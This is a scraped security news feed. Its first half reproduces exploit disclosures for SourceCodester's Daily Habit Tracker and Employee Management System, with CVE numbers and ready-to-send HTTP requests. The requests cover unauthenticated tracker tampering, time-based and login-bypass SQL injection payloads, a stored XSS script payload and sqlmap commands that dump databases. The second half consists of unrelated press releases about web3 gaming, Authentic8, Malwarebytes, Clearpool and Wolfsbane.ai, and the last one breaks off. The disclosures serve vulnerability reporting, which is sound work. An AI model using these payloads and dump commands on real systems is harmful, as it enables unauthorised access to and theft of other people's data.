Daily Habit Tracker version 1.0 suffers from an access control vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24496### Broken Access Control:> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.### Affected Components:> home.php, add-tracker.php, delete-tracker.php, update-tracker.php### Description:> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.## Proof of Concept:### Unauthenticated Access to Home page> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.### Create Tracker as Unauthenticated UserTo create a tracker, use the following request:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 108Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```### Update Tracker as Unauthenticated UserTo update a tracker, use the following request:```POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 121Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes```### Delete Tracker as Unauthenticated User:To delete a tracker, use the following request:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.

Daily Habit Tracker 1.0 Broken Access Control

Daily Habit Tracker version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24495### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> delete-tracker.php### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)### SQLMapSave the following request to `delete_tracker.txt`:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 SQL Injection

Daily Habit Tracker version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24494### Stored Cross-Site Scripting (XSS):> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.### Affected Components:> add-tracker.php, update-tracker.phpVulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat### Description:> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.## Proof of Concept:The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 175Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 Cross Site Scripting

Employee Management System version 1.0 suffers from additional remote SQL injection vulnerabilities. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    # Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24499### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/edit_profile.php> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### SQLMapSave the following request to `edit_profile.txt`:```POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 88Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/edit_profile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.------------------------# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24497### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/login.php> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `' and 1=1-- -` can be used to bypass authentication within admin login page.```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 61Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpCookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=```### SQLMapSave the following request to `admin_login.txt`:```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin&txtpassword=password&btnlogin=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Employee Management System 1.0 SQL Injection

By Uzair Amir
Web3 gaming platform Gomble Games, a spinoff of the renowned game studio ‘111%’, has now secured a total…
This is a post from HackRead.com Read the original post: Gomble Games Secures $10M Funding to Advance Ambitious Web3 Gaming Vision

Web3 gaming platform Gomble Games, a spinoff of the renowned game studio ‘111%’, has now secured a total of $10 million in cumulative investment. Recent rounds saw Gomble receiving investments from Spartan, Hashed, IOSG Ventures, Foresight Ventures, BigBrain Holdings, and others. This follows on from the initial round back in 2023 which saw participation from notable global venture capital firms such as Binance Labs, Animoca Brands, Altos Ventures, and Shima Capital.

Gomble Games’s predecessor, ‘111%’, is responsible for producing viral hits like Random Dice and BBTAN, captivating a user base of over 100 million players in seven years. Gomble Games, however, will be focused on bridging the gap between the worlds of traditional (web2) gaming and its blockchain-based (web3) counterpart.

“At Gomble Games, we firmly believe in the power of collaboration and community in game development,” said Chris Chang, CBO at Gomble Games. “Our vision is to create accessible games that are not just played but lived, where every player’s input shapes the world they immerse themselves in through very easy and engaging casual gaming experience”

“This funding is a heartening testament to our commitment to bring the best of web2 gaming into the blockchain realm, focusing on an enhanced gaming experience, a sustainable economy, and motivated participation.”

Gomble Games’ approach to gaming is centered around three key elements: Dynamic Change, Reversal Opportunity, and Simplicity, which collectively ensure an engaging and continuously evolving gaming experience. The project aims to establish a self-sustainable economy where games generate revenue based on user engagement, creating a beneficial ecosystem that rewards both players and game developers.

Looking to the future, Gomble Games envisions the establishment of a participatory DAO (Decentralized Autonomous Organization), where users are not just players but active contributors in marketing, game production, and more. This inclusive model also extends to third-party developers, who will be integral to the ecosystem’s sustainable economic structure.

“By fostering a space where every contribution is valued and rewarded, we are not just creating games but building a community where everyone has a stake in our success,” added Chris Chang.

Kelvin Koh, Co-founder of Spartan commented: “With the boom in mobile gaming, we believe that hypercasual mobile games would be one of the main drivers of users into web3. The crypto-native Gomble Games team adeptly leads this charge as they combine the technical know-how to build addictive game loops with a deep understanding of the web3 gamer community. We are proud to back the team led by Chris, and cannot wait to experience what these creative geniuses have in the pipeline” 

With this latest round of funding, Gomble Games is set to embark on a journey to transform the gaming industry, making it more fun, engaging, and rewarding for all involved.

****About Gomble Games****

Gomble Games is a web3 gaming project, a spinoff of the successful game studio 111%. With a focus on user participation in game development and an open community playground for web3 integration, Gomble Games is dedicated to bringing an enhanced gaming experience to the web3 world. Building on the legacy of 111%, Gomble Games aims to create skill-based, fun, and broadly appealing casual games.

**Contact:**  
Chris Chang  
CBO at Gomble Games  
\[email protected\]

****RELATED ARTICLES****

1.  What is Blockchain Gaming and its Play-to-Earn Model?
2.  Exploring Data Privacy and Security in B2B Gaming Data
3.  GAM3S.GG Raises $2M to Grow Web3 Gaming Superapp
4.  The Rise of Blockchain Gaming and Secure Marketplaces
5.  Blockchain in Identity Management: Securing Personal Data

Gomble Games Secures $10M Funding to Advance Ambitious Web3 Gaming Vision

By Cyber Newswire
Washington, DC, United States, April 2nd, 2024, CyberNewsWire Authentic8, provider of the leading OSINT research platform Silo for…
This is a post from HackRead.com Read the original post: Authentic8 launches Silo Shield program to protect high-risk communities in partnership with CISA

**Washington, DC, United States, April 2nd, 2024, CyberNewsWire**

Authentic8, provider of the leading OSINT research platform Silo for Research, today launched their Silo Shield Program to enhance online security for high-risk communities. Also today, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) launched a webpage listing free tools and services to strengthen defenses of high-risk communities, including Authentic8’s new Silo Shield Program.

These “high-risk” communities — non-governmental organizations, journalists, and academics — face digital risks that are existential threats to their missions, as they are targeted by some of the world’s most capable advanced persistent threats (APTs). The new Silo Shield Program enables eligible persons to apply for access to Authentic8’s Silo for Research platform, which provides a secure solution to collect publicly available information. Securely collecting web-based information is essential for these groups to carry out research, investigations, and advocacy.

“In an era where adversaries threaten those striving for social change and transparency, Authentic8 is proud to launch the Silo Shield Program. This pioneering initiative offers robust online protection for high-risk communities at the forefront of pushing boundaries and challenging the status quo. While we have supported similar organizations for years, recent work with CISA prompted us to formalize and expand access to those at risk,” says Ramesh Rajagopal, CEO and co-founder of Authentic8.

High-risk communities eligible to apply to the Silo Shield Program include:

*   **Journalists** focusing on topics like security, transparency and global affairs who perform online research and may be targeted by adversaries as a part of their work.
*   **Activists and non-profit groups** are eligible for Silo Shield as they work to safeguard human rights, prevent abuse and effect justice, as they rely on online research to uncover and document abuses, legal violations and advocacy opportunities.
*   **Academics** in fields like security, political science, sociology and environmental studies, whose research on global issues demands access to information across geographical boundaries — often in restrictive environments — are eligible.
*   **Humanitarian aid organizations**, including those focusing on direct support, anti-corruption efforts and digital freedom are eligible for Silo Shield, as their efforts to compile evidence, vet suppliers and aid recipients, and communicate safely online are critical to their missions.

“Our commitment to high-risk communities is more than just a promise; it’s a mission to arm them with the tools they need to conduct their vital work securely and confidently. We are proud to enable their access to global online resources without fear of adversary surveillance or compromise,” says Matt Ashburn, a former CIA cyber officer and White House NSC Director who now serves as Authentic8’s vice president of Customer Success.

Through the Joint Cyber Defense Collaborative (JCDC), Authentic8 collaborated with CISA on their High-Risk Communities Protection effort to elevate awareness of the cyber threats that high-risk communities experience and resources available to mitigate them. CISA’s High-Risk Communities webpage serves as a one-stop-shop for cybersecurity guidance and free or discounted tools and resources that are tailored to meet the needs of high-risk organizations that want to improve their cybersecurity baseline.

For more information on the Silo Shield program or the Silo for Research digital investigations platform, visit https://authentic8.com.

**Contact**

**Head of Strategic Initiatives**  
**Abel Vandegrift**  
**Authentic8**  
**\[email protected\]**

Authentic8 launches Silo Shield program to protect high-risk communities in partnership with CISA

Our Trusted Advisor dashboard provides an easy-to-understand assessment of your device’s security.

First released for Windows last year, the Malwarebytes Trusted Advisor dashboard is also now available on Mac, iOS and Android. 

Our Trusted Advisor dashboard provides an easy-to-understand assessment of your device’s security, with a single comprehensive protection score, and clear, expert-driven advice. 

In our recent report, “Everyone’s afraid of the internet, and no-one’s sure what to do about it,” we found that only half of the people surveyed feel confident they know how to stay safe online and even fewer are taking the right measures. 

So, though the fears are big, they are followed by very little action. We want to make things easy for our customers so they know what they should be doing, and how. 

Computer security can be difficult and time consuming, especially if you consider all the different devices and operating systems. We want to help our customers, whatever they use. 

Getting it right means knowing what software needs to be updated, whether your system settings are configured securely, and running active protection that can uncover hidden threats. 

Getting it wrong means leaving gaps in your defences that malware, criminal hackers, and other online threats can sneak through. 

Trusted Advisor takes away the guesswork by delivering a holistic assessment of your security and privacy in a way that’s easy to understand, making issues simple to correct. It combines the proven capabilities of Malwarebytes with the knowledge of the brightest industry experts to give you an expert assessment that puts you one step ahead of the cybercrooks. 

**Protection score**

At the heart of Trusted Advisor is a single, easy-to-understand protection score. If you’re rocking a 100% rating then you know you’re crushing it. 

If your score dips below 100%, we’ll explain why, and offer you a checklist of items to improve your security and boost your score. 

Trusted Advisor’s recommendations are practical and jargon-free, so they’re easy to action.

**Six steps to security**

Trusted Advisor monitors various categories of information around security and privacy to assess your overall Protection Score: 

*   **Real-time protection** monitors your device continuously, stopping and removing threats like malware as they appear. It’s vital for keeping you safe from the most destructive threats and the most common methods of infection, so Trusted Advisor will alert you if you aren’t fully protected. 
*   **Software updates** fix the coding flaws that cybercriminals exploit to steal data or put malware on your system. Staying up to date is one of the most important things you can do for your security, so Trusted Advisor has your back here too. 

*   **General settings** covers settings within Malwarebytes, Operating Systems, or your network preferences. Trusted Advisor checks for settings that may not be configured correctly. For example, on iOS it ensures you have defined a passcode for your device and activated web and call protection. 
*   **Device scans** are routine scans that seek out hidden threats on your system. Trusted Advisor will tell you if you get behind and need to run a scan manually. 
*   **Online privacy** helps you take a proactive stance on your privacy by hiding your IP address and blocking third-party ad trackers, making you’re harder to track on the web. Trusted Advisor monitors this so you only part with the personal information you intend to. 
*   **Device health** guards against slowdowns and other performance problems. Trusted Advisor helps you get the most out of your system so that you aren’t left guessing whether it was malware grinding your device to a halt. 

Even with an excellent score, you can’t guarantee absolute safety, though it places you in the closest proximity to it. By following our recommendations, you’ll be in the best security situation you can be.

**Try it today**

If you’re an existing Malwarebytes customer you will get Trusted Advisor automatically, but if you’re in a hurry, you can go to **Settings** > **About** > **Check for updates** and get it right now. If you aren’t, you can get Trusted Advisor by just **downloading the latest version of Malwarebytes**.

 Trusted Advisor now available for Mac, iOS, and Android   

By Uzair Amir
Clearpool launches Credit Vaults on Avalanche, offering an on-chain credit solution with real-world asset backing, marking a significant step in bridging traditional finance and DeFi through partnerships with firms like Banxa.
This is a post from HackRead.com Read the original post: Clearpool Expands to Avalanche with Listed Fintech Firm Launching First Credit Vault

Clearpool, a leading on-chain credit marketplace, is thrilled to announce its expansion to Avalanche with an exclusive launch of its new real-world asset (RWA)-backed product, Credit Vaults. 

While Clearpool’s permissionless pools brought private credit yield to DeFi, especially for trading firms and market makers as borrowers, Credit Vaults cater to the influx of new on-chain borrowers, including fintech and payment companies, through stable rates and stickier liquidity.

With Credit Vaults, Clearpool empowers borrowers to set their terms, such as interest rates and repayment frequencies. Credit Vaults also enable higher lending APYs via 100% utilization, increasing lending volume and protocol revenue and making interest rates for lenders more efficient.

“Avalanche is the ideal platform to support the launch of Clearpool’s Credit Vaults,” said Morgan Krupetsky, Senior Director of BD for Institutions and Capital Markets at Ava Labs. “The collaboration with Clearpool showcases a mutual commitment to developing innovative digital financial products and a shared focus on bringing tokenized assets and greater utility into the Avalanche ecosystem.”

****Bringing Short-term & Liquid Fintech Pools to DeFi****

Banxa, a publicly listed (TSX.V: BNXA, OTCQX: BNXAF) global infrastructure provider enabling embedded crypto in the payments space, has joined forces with Clearpool to launch the inaugural Credit Vault. The Credit Vault will enable Banxa to start by borrowing up to USDT 5 million, with lenders benefiting from the flexibility of a seven-day repayment window and additional rewards paid in the AVAX token.

Typically, investing in receivable financing opportunities involves medium to long-term lockups for lenders, particularly in activities such as trade financing or invoice financing. While this time horizon aligns with the traditional credit world, there is a growing preference among DeFi users for more liquid alternatives. Unlike competing on-chain fintech lending pools, Credit Vault lenders can request fund withdrawals within as little as seven days. 

****Institutional Adoption Accelerating on Clearpool****

The launch of Credit Vaults is a significant milestone in the RWA space, providing the most liquid and short-term fintech pools in the market. The institutional adoption of crypto and DeFi is rapidly gaining momentum and seeing increased demand for on-chain credit. With over 20 institutions already having borrowed on the platform, including Wall Street giant Jane Street, Clearpool is at the forefront of this trend.

Banxa’s recent entry to on-chain borrowing further emphasizes the growing interest in Clearpool’s product offerings, with several institutions in the pipeline set to follow. Clearpool’s mission is to bridge the gap between the traditional private credit market (currently $1.5 trillion and expected to reach $2.3 trillion by 2027, according to Morgan Stanley) and the decentralized lending ecosystem. 

“Launching Credit Vaults on Avalanche marks a major milestone for Clearpool and the RWA sector as we pioneer migrating credit on-chain. Working with prominent players such as the listed fintech, Banxa, and experienced credit fund, Cauris, validates the enormous potential of Credit Vaults to revolutionize the RWA DeFi space and drive institutional adoption,” said Jakob Kronbichler, CEO & Co-founder of Clearpool.

****Leading Embedded Crypto Provider Pioneers Credit Vaults****

Founded in 2014 and publicly listed (TSX.V: BNXA, OTCQX: BNXAF), Banxa is the trusted partner of choice for businesses seeking to take ownership of their crypto journey. It helps businesses integrate crypto and fiat payments for global audiences with lower fees and higher conversion rates through an extensive network of global and local payment solutions and regulatory licenses. With immense year-on-year growth and ~AUD$3.4 billion in transactions, Banxa is the leading global infrastructure provider enabling embedded crypto.

“Clearpool’s Credit Vaults offer us the flexibility to meet our liquidity requirements, allowing us to set our own terms and attract a wider range of lenders. With their seamless and efficient on-chain credit solution, we are excited to develop our relationship with Clearpool as our demand for working capital continues to grow with rapidly rising transaction volumes,” said Holger Arians, Chairman & CEO of Banxa.

Cauris, an investment firm specializing in private credit for financial technology companies, has structured, will manage, and is the servicer for the Credit Vault. Specifically, they have implemented security measures, including direct control over designated bank accounts for fund flow and critical covenants, to ensure the integrity of the system.

Clearpool’s launch of Credit Vaults on Avalanche signals a paradigm shift in on-chain RWAs. Clearpool is at the forefront of this shift, ushering in a new era of institutional borrower profiles in DeFi.

****About Clearpool****

Clearpool is the leading decentralized finance credit marketplace. A permissionless protocol enables institutions to raise unsecured liquidity directly from DeFi markets, while a separate fully permissioned platform, Clearpool Prime, further meets the compliance needs for wholesale borrowing and lending of digital assets by institutional market participants. Liquidity providers on Clearpool earn attractive yields, with pool interest rates enhanced by additional rewards paid in CPOOL — the protocol’s utility and governance token. Clearpool LP tokens, called cpTokens, are the building blocks for a system of tokenized credit and on-chain risk management.

Launched in March 2022, Clearpool has originated over US$480 million in loans with a growing user base spanning both crypto and TradFi institutions such as Wintermute, Jane Street, Fasanara Digital, CoinShares, and others. The protocol launched on the Ethereum mainnet in March 2022, followed by the expansion to Polygon PoS in July 2022, Polygon zkEVM in July 2023, Optimism in October 2023, and Mantle Network in February 2024.

****About Avalanche****

Avalanche is a smart contracts platform that scales infinitely and regularly finalizes transactions in less than one second. Its novel consensus protocol, Subnet infrastructure, and HyperSDK toolkit enable Web3 developers to easily launch powerful, custom blockchain solutions. Build anything you want, any way you want, on the eco-friendly blockchain designed for Web3 devs.

****About Banxa****

Banxa (TSX.V: BNXA, OTCQX: BNXAF) is the leading infrastructure provider for enabling embedded crypto – empowering businesses to take control of their crypto journey. Through an extensive and growing network of global and local payment solutions and regulatory licenses, Banxa helps businesses provide seamless integration of crypto and fiat for global audiences with lower fees and higher conversion rates. Headquartered in the USA, Europe, and Asia-Pacific, the Banxa team is building for a world where global commerce is run on digital assets.

Clearpool Expands to Avalanche with Listed Fintech Firm Launching First Credit Vault

By Cyber Newswire
Congressman Swalwell partners with Wolfsbane.ai, using advanced tech to shield his 2024 campaign from AI deepfakes and safeguard election integrity.
This is a post from HackRead.com Read the original post: Swalwell for Congress Campaign with Wolfsbane.ai Against AI-Generated Cloning

Today, Congressman Eric Swalwell, CA-14, announced that he has partnered with Wolfsbane.ai to help prevent his 2024 election campaign content from being used to create AI clones and deepfakes. Wolfsbane.ai will use its patent-pending technology to encode Rep. Swalwell’s campaign videos and audio with a countermeasure that makes it difficult to create AI clones with that content.

Rep. Swalwell is the first political figure to use Wolfsbane.ai and take an active step to ensure that his campaign content is not used to create clones and fakes that can be used for misinformation.

“Ensuring the integrity of our democratic process is of paramount importance,” said Swalwell. “Embracing cutting-edge tools such as Wolfsbane.ai to prevent deepfakes is not just an option; it’s a necessity in safeguarding elections against fraud and misinformation.”

Rep. Swalwell is a ranking member of the Cybersecurity and Infrastructure Protection Congressional Subcommittee where he has stressed the dangers of AI-generated deepfakes in spreading election misinformation.

Rep. Swalwell is not merely talking about preventing deepfakes, he is taking active steps to ensure that his voice and likeness are protected using the latest technology advancements.

“AI is a potent technology,” said Swalwell. “If used irresponsibly, it can hijack the likeness and voice of public figures to undermine their credibility and spread disinformation. Wolfsbane.ai will mitigate the risks of this happening to me.”

The latest development happened two months after the Check Point Research team highlighted the dangers posed by the widespread availability of artificial intelligence-based technologies, particularly deepfake, in encouraging electoral fraud.

One of the advancements in the fight against AI deepfakes is Wolfsbane.ai. Wolfsbane.ai is a recently launched service offered by Play Cubed: A company founded by content protection pioneers Randy Saaf and Octavio Herrera as well as Fazri Zubair and Noah Edelman. Wolfsbane.ai allows customers to protect their content, voice, IP and identity from unauthorized AI cloning and deepfakes.

Before publishing any content, Wolfsbane.ai customers can use a simple interface to upload and quickly process it; once done that content is protected by the Wolfsbane countermeasure and the user can publish their content with peace of mind. Wolfsbane.ai’s patent-pending encoding technology offers a strong defense, designed to effectively combat a wide spectrum of AI cloning tools.

Wolfsbane.ai is being used by music artists, entertainment companies, content creators, and individuals but the company is very focused on working with campaigns as well as government officials. “We are proud to be working with Rep. Swalwell’s campaign,” said Play Cubed CEO Randy Saaf. “We think our technology can be an effective tool in the fight against AI fakes during this important election year.”

****About Swalwell for Congress:****

Elected in 2012 to Congress, representing the East Bay in Northern California, Eric Swalwell served eight years on the House Intelligence Committee where he was the chairman and ranking member overseeing the CIA. On the Intelligence Committee, Eric helped lead the House Investigation into Russia’s interference in the 2016 election, and later, the first and second impeachments of Donald Trump.

As a member of the House Democrats’ leadership team, Eric was on the House Floor on January 6. A week after the attack, Eric was appointed as a House Impeachment Manager for the former president’s Senate trial.

Eric currently serves on the House Judiciary and Homeland Security Committees. He is also Chairman Emeritus and founder of Future Forum, a group of young Democratic members focused on issues and opportunities for millennial Americans. Eric is also the founder and co-chair of the bipartisan Critical Materials Caucus and Personalized Medicine Caucus. Every day Eric strives to make sure if you work hard it adds up to doing better for yourself and dreaming bigger for your family.  

****About Play Cubed/Wolfsbane.ai****

